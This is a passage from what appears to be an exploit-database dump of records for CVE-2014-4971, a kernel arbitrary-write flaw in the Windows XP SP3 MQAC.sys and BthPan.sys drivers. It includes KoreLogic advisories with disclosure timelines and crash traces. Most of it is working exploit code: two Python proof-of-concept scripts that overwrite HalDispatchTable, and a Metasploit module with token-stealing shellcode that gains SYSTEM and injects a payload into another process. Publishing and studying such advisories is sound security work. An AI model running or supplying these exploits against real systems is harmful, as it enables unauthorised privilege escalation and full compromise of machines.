vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. 
KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an \"up-platform\"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n \r\n7. Proof of Concept\r\n \r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = 
c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print \"[+] HalDispatchTable+0x4 overwritten\"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n \r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n \r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. 
We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n \r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22462"}, {"lastseen": "2018-03-09T19:09:07", "edition": 2, "description": "A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process.", "published": "2014-07-25T00:00:00", "type": "zdt", "title": "MQAC.sys Arbitrary Write Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "1337DAY-ID-22477", "href": "https://0day.today/exploit/description/22477", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within the MQAC.sys module allows an attacker to\r\n overwrite an arbitrary location in kernel memory.\r\n\r\n This module will elevate itself to SYSTEM, then inject the payload\r\n into another SYSTEM process.\r\n },\r\n 'License' => 
MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin', # original exploit and all the hard work\r\n 'Spencer McIntyre' # MSF module\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3',\r\n {\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ],\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'EDB', '34112' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]\r\n ],\r\n 'DisclosureDate'=> 'Jul 22 2014',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def find_sys_base(drvname)\r\n session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')\r\n session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])\r\n session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])\r\n results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)\r\n addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\")\r\n\r\n addresses.each do |address|\r\n results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)\r\n current_drvname = results['lpBaseName'][0..results['return'] - 1]\r\n if drvname == nil\r\n if current_drvname.downcase.include?('krnl')\r\n return [address, current_drvname]\r\n end\r\n elsif drvname == results['lpBaseName'][0..results['return'] - 1]\r\n return [address, current_drvname]\r\n end\r\n end\r\n end\r\n\r\n # Function borrowed from smart_hashdump\r\n def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = 
resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end\r\n\r\n def open_device\r\n handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)\r\n if handle['return'] == 0\r\n print_error('Failed to open the \\\\\\\\.\\\\MQAC device')\r\n return nil\r\n end\r\n handle = handle['return']\r\n end\r\n\r\n def check\r\n handle = open_device\r\n if handle.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n os = sysinfo[\"OS\"]\r\n case os\r\n when /windows xp.*service pack 3/i\r\n return Exploit::CheckCode::Appears\r\n when /windows xp/i\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n if sysinfo[\"Architecture\"] =~ /wow64/i\r\n print_error(\"Running against WOW64 is not supported\")\r\n return\r\n elsif sysinfo[\"Architecture\"] =~ /x64/\r\n print_error(\"Running against 64-bit systems is not supported\")\r\n return\r\n end\r\n\r\n if is_system?\r\n print_error(\"This meterpreter session is already running as SYSTEM\")\r\n return\r\n end\r\n\r\n kernel_info = find_sys_base(nil)\r\n base_addr = 0xffff\r\n print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")\r\n\r\n handle = open_device\r\n return if handle.nil?\r\n\r\n this_proc = session.sys.process.open\r\n unless this_proc.memory.writable?(base_addr)\r\n 
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")\r\n end\r\n unless this_proc.memory.writable?(base_addr)\r\n print_error('Failed to properly allocate memory')\r\n this_proc.close\r\n return\r\n end\r\n\r\n hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)\r\n hKernel = hKernel['return']\r\n halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")\r\n halDispatchTable = halDispatchTable['return']\r\n halDispatchTable -= hKernel\r\n halDispatchTable += kernel_info[0]\r\n print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")\r\n\r\n tokenstealing = \"\\x52\" # push edx # Save edx on the stack\r\n tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack\r\n tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0\r\n tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD\r\n tokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS\r\n tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax\r\n tokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN\r\n tokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)\r\n tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================\r\n tokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # 
Retrieves TOKEN and stores on EDX\r\n tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX\r\n tokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS\r\n tokenstealing << \"\\x5b\" # pop ebx # Restores ebx\r\n tokenstealing << \"\\x5a\" # pop edx # Restores edx\r\n tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!\r\n\r\n shellcode = make_nops(0x200) + tokenstealing\r\n this_proc.memory.write(0x1, shellcode)\r\n this_proc.close\r\n\r\n print_status(\"Triggering vulnerable IOCTL\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)\r\n result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\r\n\r\n unless is_system?\r\n print_error(\"Exploit failed\")\r\n return\r\n end\r\n\r\n proc = get_system_proc\r\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\r\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22477"}, {"lastseen": "2018-03-20T01:20:18", "description": "Exploit for windows platform in category local exploits", "edition": 2, "published": "2014-07-22T00:00:00", "type": "zdt", "title": "Microsoft XP SP3 BthPan.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-22T00:00:00", "id": "1337DAY-ID-22459", "href": "https://0day.today/exploit/description/22459", "sourceData": "\"\"\"\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n \r\n \r\n1. Vulnerability Details\r\n \r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n \r\n2. Vulnerability Description\r\n \r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n \r\n3. Technical Description\r\n \r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n \r\n A stack trace from our fuzzing can be seen below. 
In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n \r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n \r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n \r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n \r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. 
InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n \r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n \r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n \r\n4. Mitigation and Remediation Recommendation\r\n \r\n None. A patch is not likely to be forthcoming from the vendor.\r\n \r\n5. Credit\r\n \r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n \r\n6. 
Disclosure Timeline\r\n \r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any \"up-platform\" products. Says they\r\n are investigating embedded platforms. 
Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n \r\n7. 
Proof of Concept\r\n\"\"\"\r\n \r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack)\r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n print \"[!] 
Could not open handle to BthPan\"\r\n exit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n \r\n\"\"\"\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n \r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n \r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\"\"\"\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22459"}], "exploitdb": [{"lastseen": "2016-02-03T20:31:34", "description": "Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation. 
CVE-2014-4971. Local exploit for windows platform", "published": "2014-07-19T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-19T00:00:00", "id": "EDB-ID:34112", "href": "https://www.exploit-db.com/exploits/34112/", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. 
In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 